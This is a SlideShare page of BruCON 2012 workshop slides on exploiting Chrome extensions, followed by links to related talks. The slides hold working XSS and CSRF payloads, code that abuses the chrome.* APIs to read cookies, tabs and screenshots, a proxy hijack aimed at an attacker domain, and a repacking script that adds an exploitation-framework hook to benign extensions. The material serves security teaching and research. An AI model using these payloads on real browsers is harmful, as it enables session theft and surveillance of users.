SlideShare a Scribd company logo

Advanced Chrome extension exploitation

Krzysztof Kotowicz
Krzysztof Kotowicz

Slides from BruCON 2012 workshops "Advanced Chrome Extension exploitation" by Kyle Osborn and Krzysztof Kotowicz

1 of 57
Downloaded 103 times
Advanced   Chrome  Extension  Exploita5on Kyle  ‘Kos’  Osborn Krzysztof  Kotowicz 1
Introduc5on • Krzysztof  Kotowicz – IT  security  consultant  at  SecuRing – h<p://blog.kotowicz.net – @kkotowicz   • Kyle  Osborn – Pentester  at  AppSec  ConsulFng – h<p://kyleosborn.com/ – @theKos 2
Previous  research • Kyle  Osborn,  Ma<  Johansen – Hacking  Google  ChromeOS  (BH  2011) • N.  Carlini,  A.  Porter  Felt,  D.  Wagner  -­‐  UC  Berkeley – An  EvaluaFon  of  the  Google  Chrome  Extension  Security   Architecture h<p://www.eecs.berkeley.edu/~afelt/ extensionvulnerabiliFes.pdf • Krzysztof  Kotowicz – h<p://blog.kotowicz.net/2012/02/intro-­‐to-­‐chrome-­‐addons-­‐ hacking.html 3
Plan • Briefing – Chrome  extensions  security  101 – Abusing  Chrome  extensions – Easy  exploitaFon – Using  XSS  ChEF • Workshops – all  of  the  above  in  pracFce  &  more – h<p://kotowicz.net/brucon/ 4
CHROME  EXTENSIONS  SECURITY 5
Chrome  extensions  security • Extensions  are  HTML5  applicaFons  packaged  in  signed  .crx   files • chrome-­‐extension://<id>  URLs • Have  access  to  powerful  API – chrome.tabs – chrome.history – chrome.cookies – chrome.proxy – bundled  plugins  (NPAPI) • Permissions  defined  in  manifest.json 6
Chrome  extensions  security • Extensions  have  a  lot  of  power  to  abuse • How  bad  can  it  be?  Think... – global  XSS – idenFty  thec  (bookmarks,  history,  cookies) – filesystem  access – remote  code  execuFon  (meterpreter) 7
Chrome  extensions  security Content  script • Can  interact  with  webpage  DOM – e.g.  execute  Javascript – isolated  worlds  for  page  JS  /  content  script  JS • No  access  to  chrome.*  API 8
Chrome  extensions  security View  pages • Have  access  to  chrome.*  API • No  access  to  webpage  DOM • Content  scripts  and  view  pages  can  only   exchange  messages • Examples: – opFon  pages – new  tabs – popups 9
Chrome  extensions  security Background  page • View  page  that  runs  constantly • Has  access  to  chrome.*  API • The  UlPmate  Target 10
Chrome  extensions  security • Currently,  Chrome  extension  security  is  very   reliant  on  the  developer – WriFng  bad  code  is  easy – Giving  extensions  more  permissions  than   necessary  is  easier • Extensions  suffer  from  common  web   vulnerabili5es 11
Chrome  extensions  security • XSS:    page  DOM  has  a  vector  that  is  grabbed   and  executed  by  extension   <link  rel="alternate"  type="application/rss+xml"   title="hello  <img  src=x  onerror='alert(1)'>"   href="/rss.rss"> • CSRF:  Page  directly  requests  extension  URLs <iframe  src="chrome-­‐extension://<id>/pages/ subscribe.html?location=//evil/whitelist"></iframe> 12
Chrome  extensions  security • NPAPI  plugins  vulns – Extensions  can  use  NPAPI  plugins  (.dll,  .so  etc.) – Those  run  outside  of  Chrome  sandboxes – Full  permissions  of  current  OS  user – Possible  vulns:  RCE,  buffer  overflows,  path   disclosures,  command  injecFons,  ... • Manual  review  by  Google  if  plugin  is  used 13
Chrome  extensions  security • Content-­‐Security-­‐Policy  prevents  XSS • Chrome  supports  CSP  in  the  webpages X-Content-Security-Policy, X-WebKit-CSP • Chrome  supports  CSP  in  extensions content_security_policy  in  manifest • But... 14
Extensions  vs  CSP  in  webpage • Total  CSP  bypass – You  can  inject  any  code  via  extension   chrome.tabs.executeScript(null, {code:“alert(1)”}) – Injected  code: • is  same  origin  with  the  page  (document.cookie  etc.) • can  communicate  with  view  pages   (chrome.extension.sendMessage) 15
Extensions  vs  CSP  in  manifest • Cannot  execute  arbitrary  code • Even  CSP  in  extension  +  CSP  in  webpage  does   not  make  you  100%  safe! – You  can  pivot  the  a<ack  through  webpage – You  need  addiFonal  vulnerabiliFes  to  exploit  this 16
Chrome  extensions  security • Most  commonly  vulnerable – RSS  readers – Note  extensions – Web  Developer  extensions 17
Chrome  extensions  security manifest.json • Defines  resources,  permissions,  name  etc. • v1 – insecure,  but  everyone  uses  it • v2 – Secure  Content-­‐Security-­‐Policy  by  default  (no  XSS!) – Pages  cannot  access  extension  URLs  (no  CSRF!) – Unpopular • 26  out  of  top  1000  extensions – Will  be  enforced  in  Q3  2013 18
Chrome  extensions  security Installa5on  Methods • Chrome  Web  Store – curated  by  Google • .crx  install  from  any  website  (prompts  user) – Chrome  21  makes  off-­‐store  installs  harder • Drag  &  drop  .crx  to  chrome://extensions • Or  use  --enable-easy-off-store-extension-install  flag • MiTM  not  possible  due  to  cerFficate  signing 19
ABUSING  CHROME  EXTENSIONS 20
Fingerprin5ng • The  simplest  method – Generate  a  list  of  known  extension  IDs,  and   bruteforce  chrome-­‐extension://ID/  resources  to   discovered  extensions – use  onerror/onload  to  check  for  existence • hZp://blog.kotowicz.net/2012/02/intro-­‐to-­‐ chrome-­‐addons-­‐hacking.html 21
CSRF  -­‐  example • Chrome  Adblock  2.5.22 – Extension  UI  uses  pages/subscribe.html   – pages/subscribe.html?locaFon=url  will  subscribe   to  new  block  list var queryparts = parseUri.parseSearch(document.location.search);   BGcall("subscribe",       {id: 'url:' + queryparts.location}); • Can  be  called  by  any  webpage <iframe src="chrome-extension://<id>/pages/ subscribe.html?location=//evil/whitelist"> 22
XSS  -­‐  example • Slick  RSS  +  Slick  RSS:  Feed  Finder – simple  injecFon  locaFon  (<link>  tag  Ftle) <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>" href="/rss.rss"> 23
Leveraging  XSS • Vector  in  page  =>  XSS  in  content  script – No  access  to  chrome.*  API – Only  chrome.extension.* • e.g.  chrome.extension.connect  &   chrome.extension.sendMessage  to  communicate – Need  to  elevate  to  view  script • From  view  script chrome.extension .getBackgroundPage() .eval(”mwahahahahaaaaa!”) 24
XSS  -­‐  example 25
NPAPI  vulns  -­‐  example • CR-­‐GPG  0.7.8    (gpg-­‐gmail  bridge) • GPG  in  gmail??? 26
NPAPI  vulns  -­‐  example • Uses  external  gpg  install  through  NPAPI  plugin • Long  story  short: – Easy  to  get  from  this: 27
NPAPI  vulns  -­‐  example • To  this: 28
NPAPI  vulns  -­‐  example • To  this: 29
NPAPI  vulns  -­‐  example • To  this: 30
EASY  EXPLOITATION 31
Easy  exploita5on • alert(1)  -­‐  Now  what? • Use  an  automated  tool  to  pillage  and  plunder • BeEF  does  a  great  job  hooking  into DOMs • But  –  Need  a  special  tool  designed  to  take   advantage  of  Chrome  extension  APIs 32
Easy  exploita5on • Enter  XSS  ChEF (Chrome  Extension  Exploita2on  Framework) – Designed  from  the  ground  up  for   exploiFng  extensions – Fast  (uses  WebSockets) – Preloaded  with  automated a<ack  scripts 33
Easy  exploita5on • Monitor  open  tabs  of  vicPms • Execute  JS  on  every  tab • Extract  HTML • Read/write  cookies • Access  localStorage • Manipulate  browser  history • Take  screenshots  of  tabs • Inject  BeEF  hooks  /  keyloggers 34
USING  XSS  CHEF 35
XSS  ChEF Launching  server $ php -v PHP 5.3.12 (cli) (built: Jun 7 2012 22:49:42) Copyright (c) 1997-2012 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans $ php server.php 2>command.log XSS ChEF server by Krzysztof Kotowicz - kkotowicz at gmail dot com Usage: php server.php [port=8080] [host=127.0.0.1] Communication is logged to stderr, use php server.php [port] 2>log.txt 2012-07-22 12:40:06 [info] Server created 2012-07-22 12:40:06 ChEF server is listening on 127.0.0.1:8080 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Connected 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Performing handshake 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Handshake sent 2012-07-22 12:40:06 New hook c3590977550 from 127.0.0.1 ... 36
XSS  ChEF Console 37
XSS  ChEF Hook  code 38
XSS  ChEF 39
XSS  ChEF 40
XSS  ChEF 41
API  abuse • chrome.tabs.query  -­‐  gets  access  to  all  tabs   URLs  (even  incognito!),  Ptles,  documents  etc. chrome.tabs.query({}, function(t) { log({type: 'report_tabs','result':t}); }); 42
API  abuse • chrome.tabs.executeScript  -­‐  global  XSS  on  any   tab • bypasses  CSP chrome.tabs.executeScript(null, { code:"alert(document.cookie)" }); 43
API  abuse • chrome.tabs.captureVisibleTab chrome.tabs.captureVisibleTab(null,null, function(data_url) { log({type:'recvscreenshot', url: data_url}); }); 44
API  abuse • chrome.cookies – read/write  cookies,  even  h<pOnly chrome.cookies.getAll({url: chrome.cookies.set({ "https://www.google.com/"}, cb); url: 'https://www.google.com/', name: 'test-chef', value: 'test-ok', {"domain": ".google.com", secure: true, "expirationDate": 1358717774.49, httpOnly: true, "hostOnly": false, expirationDate: null, "httpOnly": true, path: '/' "name": "NID", }, cb); "path": "/", "secure": false, "session": false, "storeId": "0", "value": "61=...." },... 45
API  abuse • chrome.proxy  -­‐  silently  change  HTTP  proxy! var evilProxy = { "mode": "fixed_servers", "rules": { "bypassList": ["<local>","ATTACKER_DOMAIN.COM"], // EXCLUDE BACK CHANNEL FROM PROXY "singleProxy": { "host": "localhost", // ATTACKER PROXY IP "port": 8080, // ATTACKER PROXY PORT "scheme": "http" // ATTACKER PROXY SCHEME } } } chrome.proxy.settings.set({value: evilProxy, scope: 'regular'}, cb); 46
API  abuse • chrome.bookmarks  -­‐  interact  with  bookmarks chrome.bookmarks.search("http", cb); {"dateAdded": 1342946320, "id": "123", "index": 0, "parentId": "21", "title": "GMail", "url": "https://mail.google.com/"} 47
Pre-­‐Workshop  Info • Requirements – Latest  version  of  XSS  ChEF  required  (w/  dependencies) • PHP  5.3  +  HTTP  server,  opFonally  node.js • unzip,  curl   • Only  heavily  tested  under  OS  X  &  Linux – Chrome – Selected  extensions • All  links  can  be  found  on hdp://kotowicz.net/brucon 48
BREAK  (THEN  WORKSHOP) hdp://kotowicz.net/brucon 49
Workshop • Part  one:  ExploitaPon – Discovery – AutomaFon • Part  two:  Repacking – Leveraging  the  human  factor 50
Part  one:  Exploita5on • Slick  RSS • Slick  RSS:  Feed  Finder 51
Part  one:  Exploita5on • Web  Developer 52
Part  one:  Exploita5on • Springpad  Extension 53
Part  one:  Exploita5on • Cookie  Manager 54
Part  one:  Exploita5on • cr-­‐gpg 55
Part  Two:  Repacking • Wanted  to  get  MORE  privileges • UPlizes  “click-­‐through-­‐syndrome” • You  can  repack  any  other  benign  extension,   adding  malicious  part  (e.g.  XSS  chef  hook) 56
Part  Two:  Repacking $ ./repacker-webstore.sh <ID> output.crx Unpacking ... Injecting xsschef... Adding permissions... Saving... Done. Moving signed extension to output.crx 57
Ad

Recommended

Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins
 
Building Microservices with gRPC and NATS
Building Microservices with gRPC and NATSBuilding Microservices with gRPC and NATS
Building Microservices with gRPC and NATS
Shiju Varghese
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
n|u - The Open Security Community
 
Best Practices in Exception Handling
Best Practices in Exception HandlingBest Practices in Exception Handling
Best Practices in Exception Handling
Lemi Orhan Ergin
 
JQuery UI
JQuery UIJQuery UI
JQuery UI
Gary Yeh
 
Developing functional domain models with event sourcing (sbtb, sbtb2015)
Developing functional domain models with event sourcing (sbtb, sbtb2015)Developing functional domain models with event sourcing (sbtb, sbtb2015)
Developing functional domain models with event sourcing (sbtb, sbtb2015)
Chris Richardson
 
Mocking APIs Collaboratively with Postman
Mocking APIs Collaboratively with PostmanMocking APIs Collaboratively with Postman
Mocking APIs Collaboratively with Postman
Nordic APIs
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Introduction to Rust
Introduction to RustIntroduction to Rust
Introduction to Rust
Jean Carlo Machado
 
자바 직렬화 (Java serialization)
자바 직렬화 (Java serialization)자바 직렬화 (Java serialization)
자바 직렬화 (Java serialization)
중선 곽
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
AWSKRUG - AWS한국사용자모임
 
Oracle Forms: Record Groups
Oracle Forms: Record GroupsOracle Forms: Record Groups
Oracle Forms: Record Groups
Sekhar Byna
 
Setting up Page Object Model in Automation Framework
Setting up Page Object Model in Automation FrameworkSetting up Page Object Model in Automation Framework
Setting up Page Object Model in Automation Framework
valuebound
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
Jfrog artifactory as private docker registry
Jfrog artifactory as private docker registryJfrog artifactory as private docker registry
Jfrog artifactory as private docker registry
Vipin Mandale
 
Event Driven-Architecture from a Scalability perspective
Event Driven-Architecture from a Scalability perspectiveEvent Driven-Architecture from a Scalability perspective
Event Driven-Architecture from a Scalability perspective
Jonas Bonér
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
Luca Carettoni
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
Expose your event-driven data to the outside world using webhooks powered by ...
Expose your event-driven data to the outside world using webhooks powered by ...Expose your event-driven data to the outside world using webhooks powered by ...
Expose your event-driven data to the outside world using webhooks powered by ...
HostedbyConfluent
 
Javascript Objects Deep Dive
Javascript Objects Deep DiveJavascript Objects Deep Dive
Javascript Objects Deep Dive
Manish Jangir
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
Design Beautiful REST + JSON APIs
Design Beautiful REST + JSON APIsDesign Beautiful REST + JSON APIs
Design Beautiful REST + JSON APIs
Stormpath
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Difference between Github vs Gitlab vs Bitbucket
Difference between Github vs Gitlab vs BitbucketDifference between Github vs Gitlab vs Bitbucket
Difference between Github vs Gitlab vs Bitbucket
jeetendra mandal
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Fundamental of ELK Stack
Fundamental of ELK StackFundamental of ELK Stack
Fundamental of ELK Stack
주표 홍
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Krzysztof Kotowicz
 
Ad

More Related Content

What's hot (20)

Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Introduction to Rust
Introduction to RustIntroduction to Rust
Introduction to Rust
Jean Carlo Machado
 
자바 직렬화 (Java serialization)
자바 직렬화 (Java serialization)자바 직렬화 (Java serialization)
자바 직렬화 (Java serialization)
중선 곽
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
AWSKRUG - AWS한국사용자모임
 
Oracle Forms: Record Groups
Oracle Forms: Record GroupsOracle Forms: Record Groups
Oracle Forms: Record Groups
Sekhar Byna
 
Setting up Page Object Model in Automation Framework
Setting up Page Object Model in Automation FrameworkSetting up Page Object Model in Automation Framework
Setting up Page Object Model in Automation Framework
valuebound
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
Jfrog artifactory as private docker registry
Jfrog artifactory as private docker registryJfrog artifactory as private docker registry
Jfrog artifactory as private docker registry
Vipin Mandale
 
Event Driven-Architecture from a Scalability perspective
Event Driven-Architecture from a Scalability perspectiveEvent Driven-Architecture from a Scalability perspective
Event Driven-Architecture from a Scalability perspective
Jonas Bonér
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
Luca Carettoni
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
Expose your event-driven data to the outside world using webhooks powered by ...
Expose your event-driven data to the outside world using webhooks powered by ...Expose your event-driven data to the outside world using webhooks powered by ...
Expose your event-driven data to the outside world using webhooks powered by ...
HostedbyConfluent
 
Javascript Objects Deep Dive
Javascript Objects Deep DiveJavascript Objects Deep Dive
Javascript Objects Deep Dive
Manish Jangir
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
Design Beautiful REST + JSON APIs
Design Beautiful REST + JSON APIsDesign Beautiful REST + JSON APIs
Design Beautiful REST + JSON APIs
Stormpath
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Difference between Github vs Gitlab vs Bitbucket
Difference between Github vs Gitlab vs BitbucketDifference between Github vs Gitlab vs Bitbucket
Difference between Github vs Gitlab vs Bitbucket
jeetendra mandal
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Fundamental of ELK Stack
Fundamental of ELK StackFundamental of ELK Stack
Fundamental of ELK Stack
주표 홍
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Introduction to Rust
Introduction to RustIntroduction to Rust
Introduction to Rust
Jean Carlo Machado
 
자바 직렬화 (Java serialization)
자바 직렬화 (Java serialization)자바 직렬화 (Java serialization)
자바 직렬화 (Java serialization)
중선 곽
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
goployer, 코드 기반의 배포 도구 - 송주영 (beNX) :: AWS Community Day 2020
AWSKRUG - AWS한국사용자모임
 
Oracle Forms: Record Groups
Oracle Forms: Record GroupsOracle Forms: Record Groups
Oracle Forms: Record Groups
Sekhar Byna
 
Setting up Page Object Model in Automation Framework
Setting up Page Object Model in Automation FrameworkSetting up Page Object Model in Automation Framework
Setting up Page Object Model in Automation Framework
valuebound
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
Jfrog artifactory as private docker registry
Jfrog artifactory as private docker registryJfrog artifactory as private docker registry
Jfrog artifactory as private docker registry
Vipin Mandale
 
Event Driven-Architecture from a Scalability perspective
Event Driven-Architecture from a Scalability perspectiveEvent Driven-Architecture from a Scalability perspective
Event Driven-Architecture from a Scalability perspective
Jonas Bonér
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
Luca Carettoni
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
Expose your event-driven data to the outside world using webhooks powered by ...
Expose your event-driven data to the outside world using webhooks powered by ...Expose your event-driven data to the outside world using webhooks powered by ...
Expose your event-driven data to the outside world using webhooks powered by ...
HostedbyConfluent
 
Javascript Objects Deep Dive
Javascript Objects Deep DiveJavascript Objects Deep Dive
Javascript Objects Deep Dive
Manish Jangir
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
Design Beautiful REST + JSON APIs
Design Beautiful REST + JSON APIsDesign Beautiful REST + JSON APIs
Design Beautiful REST + JSON APIs
Stormpath
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Difference between Github vs Gitlab vs Bitbucket
Difference between Github vs Gitlab vs BitbucketDifference between Github vs Gitlab vs Bitbucket
Difference between Github vs Gitlab vs Bitbucket
jeetendra mandal
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Fundamental of ELK Stack
Fundamental of ELK StackFundamental of ELK Stack
Fundamental of ELK Stack
주표 홍
 

Viewers also liked (20)

When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Krzysztof Kotowicz
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
Michele Orru
 
OVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source TreeOVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source Tree
Chang W. Doh
 
Android chromium web view
Android chromium web viewAndroid chromium web view
Android chromium web view
朋 王
 
Chrome & Webkit overview
Chrome & Webkit overviewChrome & Webkit overview
Chrome & Webkit overview
Bin Chen
 
Piping materials v imp
Piping materials v impPiping materials v imp
Piping materials v imp
Mohmmad Hussain Hussain
 
Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents
Ipsos France
 
Google Chrome Extensions
Google Chrome ExtensionsGoogle Chrome Extensions
Google Chrome Extensions
Samantha Morra
 
Field Joint of Cement lined Pipe
Field Joint of Cement lined PipeField Joint of Cement lined Pipe
Field Joint of Cement lined Pipe
Johnson Prabu
 
Organic Architecture
Organic ArchitectureOrganic Architecture
Organic Architecture
Ar. M. Senthil [ senthilmani ]
 
Chromium ui framework(shared)
Chromium ui framework(shared)Chromium ui framework(shared)
Chromium ui framework(shared)
gnomekr
 
Roof
RoofRoof
Roof
Tariq H.M.A
 
Shell structure (basic concept)
Shell structure (basic concept)Shell structure (basic concept)
Shell structure (basic concept)
Ian Toisa
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
Mobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalMobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigital
Aleyda Solís
 
The Minimum Loveable Product
The Minimum Loveable ProductThe Minimum Loveable Product
The Minimum Loveable Product
The Happy Startup School
 
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
Board of Innovation
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Krzysztof Kotowicz
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
Michele Orru
 
OVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source TreeOVERVIEW: Chromium Source Tree
OVERVIEW: Chromium Source Tree
Chang W. Doh
 
Android chromium web view
Android chromium web viewAndroid chromium web view
Android chromium web view
朋 王
 
Chrome & Webkit overview
Chrome & Webkit overviewChrome & Webkit overview
Chrome & Webkit overview
Bin Chen
 
Piping materials v imp
Piping materials v impPiping materials v imp
Piping materials v imp
Mohmmad Hussain Hussain
 
Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents Baromètre Bien-Être des adolescents
Baromètre Bien-Être des adolescents
Ipsos France
 
Google Chrome Extensions
Google Chrome ExtensionsGoogle Chrome Extensions
Google Chrome Extensions
Samantha Morra
 
Field Joint of Cement lined Pipe
Field Joint of Cement lined PipeField Joint of Cement lined Pipe
Field Joint of Cement lined Pipe
Johnson Prabu
 
Organic Architecture
Organic ArchitectureOrganic Architecture
Organic Architecture
Ar. M. Senthil [ senthilmani ]
 
